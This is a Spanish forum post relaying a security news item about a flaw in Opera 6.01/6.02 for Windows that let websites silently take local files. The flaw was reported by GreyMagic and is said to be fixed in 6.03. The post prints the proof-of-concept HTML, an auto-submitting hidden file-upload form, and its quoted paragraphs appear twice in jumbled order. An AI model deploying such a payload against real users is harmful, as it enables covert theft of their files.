byes...
Cita:
mas info en...Una vulnerabilidad en las versiones 6.01 y 6.02 del navegador Opera para Windows hace posible para intrusos obtener, por conducto de un sitio web, ficheros del sistema local del usuario.
El mayor problema radica en que la intrusión no requiere interacción alguna por parte del usuario. “La vulnerabilidad más devastadora encontrada en Opera hasta ahora”, comenta la compañía de seguridad informática GreyMagic Software.
El problema radica en la forma en que Opera gestiona los envíos de formularios que implican transferencias vía HTTP. Normalmente, el sistema debería presentar una ventana de advertencia en que se indica que se iniciará una transferencia de ficheros. Sin embargo, en este caso es posible evitar el cuadro de diálogo mediante el código HTML y, de esa forma, simular que no hay transferencia alguna.
Tal simulación es en extremo sencilla y sólo requiere insertar el siguiente código en un sitio web:
Opera Software informa que el problema ha sido corregido en la última versión, número 6.03, de su navegador.
El mayor problema radica en que la intrusión no requiere interacción alguna por parte del usuario. “La vulnerabilidad más devastadora encontrada en Opera hasta ahora”, comenta la compañía de seguridad informática GreyMagic Software.
El problema radica en la forma en que Opera gestiona los envíos de formularios que implican transferencias vía HTTP. Normalmente, el sistema debería presentar una ventana de advertencia en que se indica que se iniciará una transferencia de ficheros. Sin embargo, en este caso es posible evitar el cuadro de diálogo mediante el código HTML y, de esa forma, simular que no hay transferencia alguna.
Tal simulación es en extremo sencilla y sólo requiere insertar el siguiente código en un sitio web:
Código:
El formulario es transmitido entonces junto con el fichero solicitado. <body onload="document.secForm.submit()"> <form method="post" enctype="multipart/form-data" action="recFile.php" name="secForm"> <input type="file" name="expFile" value="c:\test.txt&#10;" style="visibility:hidden"> </form> </body>
Opera Software informa que el problema ha sido corregido en la última versión, número 6.03, de su navegador.
<a href='ir.asp?http://sec.greymagic.com/news/' target='_blank'>http://sec.greymagic.com/news/...</a>
ciao..
<center>
Quieres Informacion sobre Cusco - Perú - Machupicchu?[/I]<br><a href="http://www.infocusco.com">infocusco.com</a>